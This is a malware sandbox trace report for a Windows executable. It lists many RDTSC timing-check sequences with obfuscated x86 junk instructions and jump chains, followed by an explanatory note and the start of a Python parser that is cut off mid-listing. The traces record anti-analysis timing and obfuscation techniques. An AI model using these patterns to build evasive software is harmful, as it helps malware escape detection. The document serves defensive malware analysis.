Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A001A second address: 51A003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 58E5236Dh 0x00000010 mov ch, 89h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A003D second address: 51A0041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A0041 second address: 51A0052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A0052 second address: 51A0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A0058 second address: 51A00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F83146B40D4h 0x00000013 sbb si, 11C8h 0x00000018 jmp 00007F83146B40CBh 0x0000001d popfd 0x0000001e mov ax, 8B3Fh 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F83146B40D2h 0x0000002a sub esp, 2Ch 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A00BB second address: 51A00BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A00BF second address: 51A00C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A00C5 second address: 51A00D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A00D4 second address: 51A017A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push edx 0x00000011 mov cx, C20Bh 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F83146B40CEh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F83146B40D0h 0x00000023 xchg eax, edi 0x00000024 pushad 0x00000025 call 00007F83146B40CEh 0x0000002a movzx eax, dx 0x0000002d pop edx 0x0000002e pushfd 0x0000002f jmp 00007F83146B40CCh 0x00000034 and ah, FFFFFFA8h 0x00000037 jmp 00007F83146B40CBh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f jmp 00007F83146B40D9h 0x00000044 xchg eax, edi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F83146B40CDh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A01D2 second address: 51A01E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(2).exe RDTSC instruction interceptor: First address: 51A01E1 second address: 51A024E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F83146B40CFh 0x00000009 add cx, B06Eh 0x0000000e jmp 00007F83146B40D9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F83146B40D0h 0x0000001a sbb cl, FFFFFFE8h 0x0000001d jmp 00007F83146B40CBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 inc ebx 0x00000027 pushad 0x00000028 call 00007F83146B40D4h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A024E second address: 51A026A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 test al, al 0x0000000a pushad 0x0000000b mov bh, 80h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 popad 0x00000012 je 00007F8314EA9393h 0x00000018 pushad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02C8 second address: 51A02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02CE second address: 51A02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA9197h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A02FA second address: 51A0326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F83146B40CCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0326 second address: 51A0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA918Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A039A second address: 51A0407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jg 00007F8384F721B2h 0x0000000c pushad 0x0000000d jmp 00007F83146B40D8h 0x00000012 pushfd 0x00000013 jmp 00007F83146B40D2h 0x00000018 sub al, 00000038h 0x0000001b jmp 00007F83146B40CBh 0x00000020 popfd 0x00000021 popad 0x00000022 js 00007F83146B4151h 0x00000028 jmp 00007F83146B40D6h 0x0000002d cmp dword ptr [ebp-14h], edi 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0407 second address: 51A040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A040B second address: 51A040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A040F second address: 51A0415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0415 second address: 51A041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A041B second address: 51A041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A041F second address: 51A0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0423 second address: 51A0461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F83857671F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 pushfd 0x00000015 jmp 00007F8314EA918Bh 0x0000001a adc cl, 0000000Eh 0x0000001d jmp 00007F8314EA9199h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0461 second address: 51A0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0467 second address: 51A046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A046B second address: 51A048F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b jmp 00007F83146B40CFh 0x00000010 lea eax, dword ptr [ebp-2Ch] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ax, A091h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A048F second address: 51A0543 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8314EA918Eh 0x00000008 and cl, FFFFFFE8h 0x0000000b jmp 00007F8314EA918Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F8314EA9198h 0x00000019 sbb cx, 3448h 0x0000001e jmp 00007F8314EA918Bh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8314EA9194h 0x0000002d sub cx, 76A8h 0x00000032 jmp 00007F8314EA918Bh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F8314EA9198h 0x0000003e jmp 00007F8314EA9195h 0x00000043 popfd 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F8314EA918Ch 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0543 second address: 51A058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e push eax 0x0000000f mov ecx, ebx 0x00000011 pop edi 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F83146B40CBh 0x0000001d and cx, 175Eh 0x00000022 jmp 00007F83146B40D9h 0x00000027 popfd 0x00000028 movzx eax, dx 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A058F second address: 51A05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A05A3 second address: 51A05B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40CAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A05B2 second address: 51A05ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8314EA9196h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F8314EA918Dh 0x00000018 mov di, si 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190ABD second address: 5190AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190AC3 second address: 5190AC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190AC7 second address: 5190B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F83146B40D4h 0x00000010 sbb eax, 1DC782E8h 0x00000016 jmp 00007F83146B40CBh 0x0000001b popfd 0x0000001c pushad 0x0000001d push esi 0x0000001e pop edx 0x0000001f mov bh, ah 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 pushad 0x00000027 call 00007F83146B40D3h 0x0000002c mov ch, 34h 0x0000002e pop ebx 0x0000002f pushfd 0x00000030 jmp 00007F83146B40D2h 0x00000035 and si, 57A8h 0x0000003a jmp 00007F83146B40CBh 0x0000003f popfd 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F83146B40D5h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190B57 second address: 5190B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8314EA918Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190B7C second address: 5190BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2CDB65B2h 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx ebx, ax 0x00000014 pushfd 0x00000015 jmp 00007F83146B40CAh 0x0000001a add eax, 2821BEC8h 0x00000020 jmp 00007F83146B40CBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5190BAE second address: 5190BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8314EA9194h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0A99 second address: 51A0A9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0A9F second address: 51A0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA918Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F8314EA9199h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0AD1 second address: 51A0AE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0AE4 second address: 51A0B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8314EA918Fh 0x00000009 xor eax, 3A7C3E3Eh 0x0000000f jmp 00007F8314EA9199h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F8314EA9190h 0x0000001b or si, 8338h 0x00000020 jmp 00007F8314EA918Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c push eax 0x0000002d movsx edi, si 0x00000030 pop ecx 0x00000031 pushfd 0x00000032 jmp 00007F8314EA918Dh 0x00000037 xor esi, 7B4D89D6h 0x0000003d jmp 00007F8314EA9191h 0x00000042 popfd 0x00000043 popad 0x00000044 cmp dword ptr [75AB459Ch], 05h 0x0000004b jmp 00007F8314EA918Eh 0x00000050 je 00007F8385757005h 0x00000056 jmp 00007F8314EA9190h 0x0000005b pop ebp 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f mov cx, D6C3h 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C3F second address: 51A0C6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F83146B40D3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C6C second address: 51A0C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C70 second address: 51A0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0C76 second address: 51A0CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f call 00007F8314EA9197h 0x00000014 pop ecx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 push edx 0x0000001a mov ch, 70h 0x0000001c pop edi 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8314EA9196h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0CCF second address: 51A0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F83146B40D9h 0x00000012 pop eax 0x00000013 pushad 0x00000014 mov cx, 91A3h 0x00000018 jmp 00007F83146B40D8h 0x0000001d popad 0x0000001e call 00007F8384F68F1Eh 0x00000023 push 75A52B70h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov eax, dword ptr [esp+10h] 0x00000033 mov dword ptr [esp+10h], ebp 0x00000037 lea ebp, dword ptr [esp+10h] 0x0000003b sub esp, eax 0x0000003d push ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 mov eax, dword ptr [75AB4538h] 0x00000045 xor dword ptr [ebp-04h], eax 0x00000048 xor eax, ebp 0x0000004a push eax 0x0000004b mov dword ptr [ebp-18h], esp 0x0000004e push dword ptr [ebp-08h] 0x00000051 mov eax, dword ptr [ebp-04h] 0x00000054 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005b mov dword ptr [ebp-08h], eax 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F83146B40D7h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0D38 second address: 51A0D63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8314EA918Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0DCB second address: 51A0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0DE6 second address: 51A0E14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8314EA918Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E14 second address: 51A0E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E1A second address: 51A0E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F838574CCE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8314EA9191h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E3D second address: 51A0E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51A0E43 second address: 51A0E49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C06 second address: 51B0C6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F83146B40D4h 0x00000011 or cx, 0A48h 0x00000016 jmp 00007F83146B40CBh 0x0000001b popfd 0x0000001c mov esi, 32310DBFh 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 pushfd 0x00000026 jmp 00007F83146B40CEh 0x0000002b xor si, 4CA8h 0x00000030 jmp 00007F83146B40CBh 0x00000035 popfd 0x00000036 pop ecx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a pop eax 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C6B second address: 51B0C89 instructions: 0x00000000 rdtsc 0x00000002 mov di, A616h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8314EA918Dh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C89 second address: 51B0C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 55h 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0C90 second address: 51B0CBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F8314EA918Dh 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8314EA9193h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CBD second address: 51B0CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CC3 second address: 51B0CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CC7 second address: 51B0CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0CCB second address: 51B0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F8314EA9197h 0x00000010 mov esi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8314EA9195h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D07 second address: 51B0D0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D0C second address: 51B0D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 1Bh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8314EA918Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D29 second address: 51B0D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D2D second address: 51B0D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0D33 second address: 51B0DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F83146B40CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8384F51738h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F83146B40CEh 0x00000016 xor ax, 3E18h 0x0000001b jmp 00007F83146B40CBh 0x00000020 popfd 0x00000021 mov si, A1CFh 0x00000025 popad 0x00000026 cmp dword ptr [75AB459Ch], 05h 0x0000002d pushad 0x0000002e mov si, FBC7h 0x00000032 mov ax, 8D63h 0x00000036 popad 0x00000037 je 00007F8384F697DBh 0x0000003d jmp 00007F83146B40D6h 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 mov bh, ch 0x00000046 mov bh, 18h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F83146B40D0h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EAC second address: 51B0EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EB2 second address: 51B0EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 51B0EB6 second address: 51B0EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
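Each interceptor line above records one pair of consecutive rdtsc executions: the address of each read and every instruction executed in between. The script below is an added example; it is not part of the Joe Sandbox report and not the sample's own code. It parses lines in that format, measures the byte gap and instruction count between the two reads, separates obfuscator filler (register save/restore around the read and unconditional jumps, a set chosen here as a heuristic) from the instructions that carry logic, and finds runs of back-to-back reads. The five embedded lines are copied from the report; the regular expressions, the FILLER set and the stack-slot weights are assumptions of this example.

```python
"""Parse Joe Sandbox "RDTSC instruction interceptor" lines and measure what the
sample executes between two consecutive rdtsc reads."""
import re
import statistics
from collections import Counter

# Constructed input: five interceptor lines copied from the report above
# (as extracted, with the source path and signature text run together).
SAMPLE_LINES = [
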